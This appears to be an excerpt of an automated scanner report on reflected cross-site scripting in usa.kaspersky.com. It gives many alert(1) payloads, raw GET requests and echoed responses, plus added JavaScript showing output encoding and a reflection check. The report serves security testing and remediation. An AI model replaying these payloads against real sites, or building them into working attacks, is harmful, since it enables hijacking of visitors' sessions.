The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e07ce"><script>alert(1)</script>42a4c5f2575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f780"-alert(1)-"e86bf53504a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0c99"-alert(1)-"685c02abd53 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b25dc"><script>alert(1)</script>d322e4cce32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/tablet-securityb25dc"><script>alert(1)</script>d322e4cce32" /> ...[SNIP]...
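The two sinks this entry describes, a double-quoted HTML attribute (the canonical link built from the request path, as the response above shows) and a double-quoted JavaScript string, rendered the vulnerable way and then with context-specific output encoding. This is an added example, not code from the scan report or from the site; the host and the canonical-link markup follow the response snippet, while the analytics variable name s_pageName and all function names are assumptions, since the report only shows the tail of that script block.

```javascript
// Added example, not code from the scan report or from the site: the two sinks
// the report describes, rendered first the vulnerable way (request path copied
// verbatim) and then with output encoding chosen for each context. The host and
// the canonical-link markup follow the report's response snippets; the
// analytics variable name s_pageName is an assumption.
const HOST = "http://usa.kaspersky.com";

// Probe strings of the shape the scanner used: random hex prefix and suffix
// around a short break-out sequence. Both values are taken from this entry.
const ATTR_PAYLOAD = 'b25dc"><script>alert(1)</script>d322e4cce32';
const JS_PAYLOAD = 'a0c99"-alert(1)-"685c02abd53';

// --- Vulnerable rendering --------------------------------------------------
function renderCanonicalVulnerable(requestPath) {
  // Same shape as the <link rel="canonical"> in the report's response.
  return `<link rel="canonical" href="${HOST}${requestPath}" />`;
}

function renderPageScriptVulnerable(requestPath) {
  // Hypothetical analytics snippet built from the request path.
  return `<script>var s_pageName="${requestPath}";</script>`;
}

// --- Context-specific encoders ---------------------------------------------
// HTML attribute context: entity-encode the characters that can close the
// attribute value, close the tag, or start an entity.
function encodeHtmlAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string context: escape every character outside [A-Za-z0-9] as
// \xHH (or \u{...} above U+00FF). The closing quote becomes \x22 and "</script>"
// becomes \x3c\x2fscript\x3e, so neither the JS parser nor the HTML parser sees
// a delimiter. HTML entities are useless here: the HTML parser does not decode
// entities inside <script>, so &quot; would remain a literal &quot;.
function encodeJsString(s) {
  return Array.from(String(s), (ch) => {
    if (/[A-Za-z0-9]/.test(ch)) return ch;
    const cp = ch.codePointAt(0);
    return cp < 0x100
      ? `\\x${cp.toString(16).padStart(2, "0")}`
      : `\\u{${cp.toString(16)}}`;
  }).join("");
}

// --- Hardened rendering ----------------------------------------------------
function renderCanonicalSafe(requestPath) {
  return `<link rel="canonical" href="${encodeHtmlAttr(HOST + requestPath)}" />`;
}

function renderPageScriptSafe(requestPath) {
  return `<script>var s_pageName="${encodeJsString(requestPath)}";</script>`;
}

// The scanner's success criterion: the probe appears unmodified in the body.
function reflectsUnmodified(responseBody, payload) {
  return responseBody.includes(payload);
}

// Self-check for the script-context encoder: evaluating the encoded literal
// must give back the original value, i.e. the encoding is lossless. Function()
// is used only so the JS engine decodes the escape sequences for us.
function jsStringRoundTrip(s) {
  return new Function(`return "${encodeJsString(s)}";`)();
}

// Stand-alone demonstration on the paths from this entry.
const demoAttrPath = "/products-services/home-computer-security/tablet-security" + ATTR_PAYLOAD;
const demoJsPath = "/products-services/home-computer-security/pure" + JS_PAYLOAD;
console.log("vulnerable attribute reflects probe:", reflectsUnmodified(renderCanonicalVulnerable(demoAttrPath), ATTR_PAYLOAD));
console.log("hardened attribute reflects probe:  ", reflectsUnmodified(renderCanonicalSafe(demoAttrPath), ATTR_PAYLOAD));
console.log("vulnerable script reflects probe:   ", reflectsUnmodified(renderPageScriptVulnerable(demoJsPath), JS_PAYLOAD));
console.log("hardened script reflects probe:     ", reflectsUnmodified(renderPageScriptSafe(demoJsPath), JS_PAYLOAD));
console.log("script encoding round-trips:        ", jsStringRoundTrip(demoJsPath) === demoJsPath);
```

The same request path reaches two different parsers, which is why the report lists each path segment twice: attribute encoding does nothing for the script sink and vice versa, so each output location needs the encoder for its own context. A Content-Security-Policy that forbids inline script is a useful second layer against both payloads, not a substitute for fixing the sinks.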
1.137. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f909e"><script>alert(1)</script>6f2d209b2fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2ff9"><script>alert(1)</script>485f603b1ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/knowledge-centerf2ff9"><script>alert(1)</script>485f603b1ae/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3acc"-alert(1)-"75ba5310b70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resources/knowledge-centera3acc"-alert(1)-"75ba5310b70/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56241"><script>alert(1)</script>8fdcf2dfe51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/knowledge-center/index.html56241"><script>alert(1)</script>8fdcf2dfe51 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e8f2"-alert(1)-"38af26a7928 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resources/knowledge-center/index.html5e8f2"-alert(1)-"38af26a7928 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.142. http://usa.kaspersky.com/resources/knowledge-center/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /resources/knowledge-center/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f13"-alert(1)-"3296f683bfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resources/knowledge-center/index.html?31f13"-alert(1)-"3296f683bfa=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
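The confirmation step behind every "Confidence: Certain" finding in this report: a probe wrapped in random hex markers is sent (here as the name of a query parameter, as in the request above), located in the response, and checked for being echoed unmodified, with the surrounding markup read to name the context. This is an added example, not part of the report or of the scanner's code; the response bodies it checks are constructed to match the shapes seen in this report, and all function names are assumptions.

```javascript
// Added example (not from the scan report or the scanner): a minimal version of
// the reflection check the report's findings rest on. The responses used below
// are constructed to mirror the snippets in this report.

// Random 5 / 11 hex-digit markers, matching the shape of the report's payloads.
// `rng` is injectable so a caller can make the probe deterministic.
function makeProbe(core, rng = Math.random) {
  const hex = (n) =>
    Array.from({ length: n }, () => Math.floor(rng() * 16).toString(16)).join("");
  const prefix = hex(5), suffix = hex(11);
  return { prefix, core, suffix, text: prefix + core + suffix };
}

// Name the markup context at `index` in `body`, using the same vocabulary as
// the report: a double-quoted attribute value, or a double-quoted JS string.
function contextAt(body, index) {
  const before = body.slice(0, index);
  const lower = before.toLowerCase();
  const lastScriptOpen = lower.lastIndexOf("<script");
  const lastScriptClose = lower.lastIndexOf("</script");
  if (lastScriptOpen > lastScriptClose) {
    // Inside a script block: an odd number of unescaped double quotes since the
    // opening tag means we are inside a "..." string literal.
    const inner = before.slice(before.indexOf(">", lastScriptOpen) + 1);
    const quotes = (inner.match(/(?<!\\)"/g) || []).length;
    return quotes % 2 === 1 ? "js-string-double-quoted" : "js-code";
  }
  const lastOpen = before.lastIndexOf("<"), lastClose = before.lastIndexOf(">");
  if (lastOpen > lastClose) {
    // Inside a tag: an odd quote count means we are inside an attribute value.
    const quotes = (before.slice(lastOpen).match(/"/g) || []).length;
    return quotes % 2 === 1 ? "attribute-double-quoted" : "tag";
  }
  return "text";
}

// Locate every reflection of the probe. A reflection is "unmodified" when the
// exact probe text appears (the report's condition for a confirmed finding);
// it is modified when prefix and suffix appear but the core between them was
// altered, typically because output encoding was applied.
function findReflections(body, probe) {
  const results = [];
  let from = 0;
  for (;;) {
    const start = body.indexOf(probe.prefix, from);
    if (start === -1) break;
    const end = body.indexOf(probe.suffix, start + probe.prefix.length);
    if (end === -1) break;
    const reflected = body.slice(start, end + probe.suffix.length);
    results.push({
      start,
      reflected,
      unmodified: reflected === probe.text,
      context: contextAt(body, start),
    });
    from = end + probe.suffix.length;
  }
  return results;
}

// The report's criterion for a confirmed finding: at least one verbatim echo.
function confirmsXss(body, probe) {
  return findReflections(body, probe).some((r) => r.unmodified);
}

// Stand-alone demonstration on a constructed response in the report's shape.
const demoProbe = makeProbe('"><script>alert(1)</script>');
const demoBody =
  '<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-center/index.html?' +
  demoProbe.text + '=1" />';
console.log(findReflections(demoBody, demoProbe));
console.log("confirmed:", confirmsXss(demoBody, demoProbe));
```

Whether the probe reaches the parser unmodified is what separates a confirmed finding from a harmless, encoded reflection; re-running this check with the same two probe shapes after the fix is the quickest regression test for the remediation advice in these entries.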
1.143. http://usa.kaspersky.com/resources/knowledge-center/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /resources/knowledge-center/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a644"><script>alert(1)</script>0a50e7eee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/knowledge-center/index.html?6a644"><script>alert(1)</script>0a50e7eee8=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83184"><script>alert(1)</script>569acb540ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efae4"-alert(1)-"adf5365208a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9159e"-alert(1)-"b59df5b2090 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b395c"><script>alert(1)</script>3905b3800ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40126"><script>alert(1)</script>4d4c1686dd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e91be"-alert(1)-"12aebe11698 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.150. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /resources/knowledge-center/whitepapers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3d7"><script>alert(1)</script>93ae9a92e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e153"-alert(1)-"fb85deb5a47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search7e153"-alert(1)-"fb85deb5a47/apachesolr_search HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a126"><script>alert(1)</script>dc901a9507b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search6a126"><script>alert(1)</script>dc901a9507b/apachesolr_search HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd98d"><script>alert(1)</script>012d6f3a9b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/apachesolr_searchcd98d"><script>alert(1)</script>012d6f3a9b7 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_searchcd98d"><script>alert(1)</script>012d6f3a9b7" /> ...[SNIP]...
1.154. http://usa.kaspersky.com/search/apachesolr_search [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /search/apachesolr_search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3361b"><script>alert(1)</script>28ebda2c90f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/apachesolr_search?3361b"><script>alert(1)</script>28ebda2c90f=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95090"-alert(1)-"6ca4c5faa38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40f83"><script>alert(1)</script>b60263f7e0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efd3"><script>alert(1)</script>72b7766c221 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0711"><script>alert(1)</script>9f904e9ecf9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virusf0711"><script>alert(1)</script>9f904e9ecf9" /> ...[SNIP]...
1.159. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /search/apachesolr_search/far%20help%20virus
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f435"><script>alert(1)</script>c27525afe55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28500"><script>alert(1)</script>1b71febd288 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search28500"><script>alert(1)</script>1b71febd288/apachesolr_search/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ae97"-alert(1)-"6f128e7c3a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search6ae97"-alert(1)-"6f128e7c3a8/apachesolr_search/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e31"><script>alert(1)</script>dd86b28eecc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/apachesolr_searchc9e31"><script>alert(1)</script>dd86b28eecc/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646e5"><script>alert(1)</script>ba42b202e41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/apachesolr_search/index.html646e5"><script>alert(1)</script>ba42b202e41 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/index.html646e5"><script>alert(1)</script>ba42b202e41" /> ...[SNIP]...
1.164. http://usa.kaspersky.com/search/apachesolr_search/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /search/apachesolr_search/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d0b"><script>alert(1)</script>be3c5cc808 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/apachesolr_search/index.html?d3d0b"><script>alert(1)</script>be3c5cc808=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ede6"><script>alert(1)</script>33cc4e8f02d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af2e6"-alert(1)-"2ac881d387c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d30"><script>alert(1)</script>1c2b9503e52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f302c"><script>alert(1)</script>4c19078928f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/xssf302c"><script>alert(1)</script>4c19078928f" /> ...[SNIP]...
1.169. http://usa.kaspersky.com/search/apachesolr_search/xss [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /search/apachesolr_search/xss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0ef0"><script>alert(1)</script>70160970dfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a65a4"-alert(1)-"2aa5ec6e5f1 was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.cssa65a4"-alert(1)-"2aa5ec6e5f1?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8058e"><script>alert(1)</script>98cdc6b835d was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css8058e"><script>alert(1)</script>98cdc6b835d?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45325"><script>alert(1)</script>c89d0f96b80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites45325"><script>alert(1)</script>c89d0f96b80/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
